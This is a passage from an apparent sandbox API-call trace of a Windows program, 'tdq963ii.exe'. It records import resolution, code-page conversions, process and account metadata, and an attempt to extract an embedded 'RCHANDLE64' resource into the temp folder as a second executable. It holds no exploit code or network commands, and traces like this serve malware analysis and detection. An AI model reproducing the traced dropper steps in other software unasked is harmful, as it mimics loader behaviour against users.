!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0201.171] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÁGäEäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0201.171] GetLastError () returned 0x0 [0201.171] SetLastError (dwErrCode=0x0) [0201.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0201.171] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0201.171] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0201.171] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÁGäEäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0201.172] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x8f81c0 [0201.186] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0201.186] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0201.186] RtlSizeHeap (HeapHandle=0x8e0000, Flags=0x0, MemoryPointer=0x8f81c0) returned 0x80 [0201.187] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0201.187] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0201.187] GetCurrentProcess () returned 0xffffffff [0201.187] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0201.187] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0201.187] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0201.189] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0201.189] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0201.189] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0201.189] LockResource (hResData=0x43c648) returned 0x43c648 [0201.189] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x18) returned 0x8f8248 [0201.190] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.203] GetLastError () returned 0x20 [0201.203] GetLastError () returned 0x20 [0201.203] SetLastError (dwErrCode=0x20) [0201.203] GetLastError () returned 0x20 [0201.203] SetLastError (dwErrCode=0x20) [0201.203] GetLastError () returned 0x20 [0201.203] SetLastError (dwErrCode=0x20) [0201.204] GetLastError () returned 0x20 [0201.204] SetLastError (dwErrCode=0x20) [0201.204] GetLastError () returned 0x20 [0201.204] SetLastError (dwErrCode=0x20) [0201.204] GetLastError () returned 0x20 [0201.204] SetLastError (dwErrCode=0x20) [0201.204] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x1000) returned 0x8f97d8 [0201.205] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0201.571] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f7790 | out: hHeap=0x8e0000) returned 1 [0201.572] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0201.572] ExitProcess (uExitCode=0x1) [0201.601] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f6090 | out: hHeap=0x8e0000) returned 1 Process: id = "197" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x251d2000" os_pid = "0x7b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "192" os_parent_pid = "0xa20" cmd_line = "tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 747 os_tid = 0xa48 [0199.547] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0199.547] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0199.548] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0199.548] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0199.548] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0199.548] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0199.548] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0199.549] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0199.549] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0199.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0199.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0199.550] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0199.550] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0199.550] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0199.550] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0199.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0199.551] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0199.551] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0199.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0199.551] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0199.551] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0199.552] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0199.552] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0199.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0199.552] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0199.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0199.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0199.553] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0199.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0199.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0199.554] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0199.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0199.554] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0199.555] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0199.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0199.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0199.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0199.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0199.556] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0199.556] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0199.556] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0199.556] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0199.557] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0199.557] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0199.557] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0199.557] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0199.557] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0199.558] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.558] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0199.558] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0199.558] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0199.558] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0199.559] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0199.559] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0199.559] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0199.559] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0199.560] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0199.560] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0199.560] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0199.560] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0199.560] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0199.561] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0199.561] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0199.561] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0199.561] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0199.562] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0199.562] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0199.562] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0199.562] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0199.562] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0199.563] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0199.563] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0199.563] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0199.563] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0199.563] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0199.563] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0199.564] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0199.564] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0199.564] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0199.564] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0199.565] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0199.565] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0199.565] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0199.565] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0199.565] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0199.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0199.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0199.566] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0199.566] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0199.566] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0199.566] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0199.567] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0199.567] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0199.567] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0199.568] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0199.568] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0199.568] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0199.568] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0199.568] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0199.569] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0199.569] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0199.569] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0199.569] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0199.569] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0199.569] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0199.569] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0199.570] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0199.570] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0199.570] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0199.570] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0199.570] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0199.570] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0199.570] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0199.571] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0199.572] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0199.572] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0199.572] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0199.572] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0199.572] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0199.572] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0199.572] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0199.882] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0199.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x302bf7c0, dwHighDateTime=0x1d68287)) [0199.887] GetCurrentThreadId () returned 0xa48 [0199.888] GetCurrentProcessId () returned 0x7b0 [0199.888] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=32022660595) returned 1 [0199.892] GetProcessHeap () returned 0x520000 [0200.354] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0200.354] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0200.355] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0200.355] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0200.356] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0200.356] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0200.356] 